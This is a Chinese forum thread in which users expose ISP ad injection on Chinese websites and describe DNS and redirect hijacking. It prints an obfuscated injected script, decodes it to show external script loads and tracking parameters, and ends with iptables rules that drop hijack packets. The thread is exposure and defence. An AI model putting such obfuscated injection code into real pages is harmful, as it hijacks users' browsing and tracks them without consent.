移动宽带访问 51credit，百度等网站居然添加广告

DNS 参考资料

› dnslib for Python

This topic created in 4111 days ago, the information mentioned may be changed or developed.

代码如下，居然还是加密的。

<script>var d="=iunm?=ifbe?=mjol!sfm>#tuzmftiffu#!uzqf>#ufyu0dtt#!isfg>#iuuq;00322/249/318/33:;6873903/dtt#?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;687390d/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;00322/249/318/33:;6873903/kt#?=0tdsjqu?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?wbs!q>#iuuq;00322/249/318/33:;687390b0t@beje>311615'uddb>NUN5NUNxPUB3PUV>'vsjq>279327:544'tqpsu>";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="1'fqpsu>1'psmv>bIS1dEpwM3Kjdz52NXOz[XSqeD6kc31w[n:zeX1uN{huNT6peH2t'tqje>2783743675'bsfb>2:7'ut>2535869883'bpsmv>bIS1dEpwM{JyNT5yN{hvNkB4MkJzPUp2O{ZzPD9zNEB2NERw'q2bsn>463'q3bsn>611'q4bsn>21'q5bsn>6'q6bsn>4'q7bsn>2'bqqe>1'ibtDpvou>1'ibtXijufVtfs>1#<=0tdsjqu?=0ifbe?=cpez!je>#c#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op!pompbe>#joju)q*#!pocfgpsfvompbe>#ttu)*#?=0cpez?=0iunm?";document.write(i(d,c));</script>

uzqf

iuuq

var

17 replies • 2015-02-25 23:17:03 +08:00

yetsky

Feb 24, 2015

解密后
<html><head><link rel="stylesheet" type="text/css" href="http://211.138.207.229:57628/2.css"><script type="text/javascript" src="http://211.138.207.229:57628/c.js"></script><script type="text/javascript" src="http://211.138.207.229:57628/2.js"></script><script type="text/javascript">var p="http://211.138.207.229:57628/a/s?adid=200504&tcca=MTM4MTMwOTA2OTU=&urip=1682169433&sport=0&eport=0&orlu=aHR0cDovL2Jicy41MWNyZWRpdC5jb20vZm9ydW0tMzgtMS5odG1s&spid=1672632564&area=196&ts=1424758772&aorlu=aHR0cDovLzIxMS4xMzguMjA3LjIyOTo1NzYyOC8yMDA1MDQv&p1arm=352&p2arm=500&p3arm=10&p4arm=5&p5arm=3&p6arm=1&appd=0&hasCount=0&hasWhiteUser=0";</script></head><body id="b" rightMargin=0 topMargin=0 leftMargin=0 scroll=no onload="init(p)" onbeforeunload="sst()"></body></html>

arachide

Feb 24, 2015

正常
百度 360 金山搜狗
是中国4大垃圾软件厂商

慎用

偶是不用大把更好性能的工具何必去找虐

wdlth

Feb 24, 2015

连电信都加，移动铁通还用说？

tdifg

Feb 24, 2015

哎，你是没用过长城宽带

arachide

Feb 24, 2015

你去网吧试试bing
保准到百度

哈哈

isnowify

Feb 24, 2015 via iPhone

电信访问什么都加，手机端加完广告后整个页面都变得如此细长，惨不忍睹。。。
另外
@Livid should move to http://v2ex.com/go/bb
貌似v2ex支持回复翻页了？

zsx

Feb 24, 2015

福州铁通，行为包括：
1. 概率：相当大；劫持百度统计的统计js，行为包括：点击带百度统计的网站的任何位置都会被跳转到某页游网站、右下角弹窗其中之一；
2. 概率：100%；在PCQQ好友面板的 [动态] 和手机QQ空间触屏版投放右下角广告；
3. 概率：100%；把114DNS和Google DNS劫持到自己的DNS；
4. 概率：看心情；百度首页，强制加推广链接并清空Cookies（嗯强制退出百度账号哦）。曾经导致百度搜索无法翻页，点击第二页等强制跳转到第一页。
5. 概率：每日首次访问100%，剩下看心情；淘宝、京东等，跳转到自己的返利链接；
6. 概率：看心情；随机跳转到别的网站（比如打开zhihu.com跳到了电影站）。

另外百度首页的跳转证据还很难抓，我自己用cURL的时候就正常，还要大改HTTP头完全模拟浏览器才能抓得到……而且不定时……我要抓的时候就消失了……

nvidiaAMD980X

Feb 24, 2015 via Android

百度和Bing的页面也不整洁，Bing搜索框莫名其妙地下拉新闻给你，百度就是个广告流氓～～～最喜欢Google了，但每次搜索都要挂V---P----N。

Silicon

Feb 24, 2015

以下几条辽宁铁通保平安
请根据自己情况修改
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m ttl --ttl-eq 124 -j LOG --log-prefix "Caught bad ttl of hijack: "
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m ttl --ttl-eq 124 -m comment --comment "Bad ttl of hijack" -j DROP
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0xce56" -j LOG --log-prefix "Caught bad window of hijack"
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0xce56" -m comment --comment "Bad window of hijack" -j DROP
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0x800" -j LOG --log-prefix "Caught bad window of hijack"
iptables -t filter -A bad_302_disabler -i eno16777736 -p tcp --sport 80 -m u32 --u32 "0x6&0xff=0x6&&0x0>>0x16&0x3c@0xc&0xffff=0x800" -m comment --comment "Bad window of hijack" -j DROP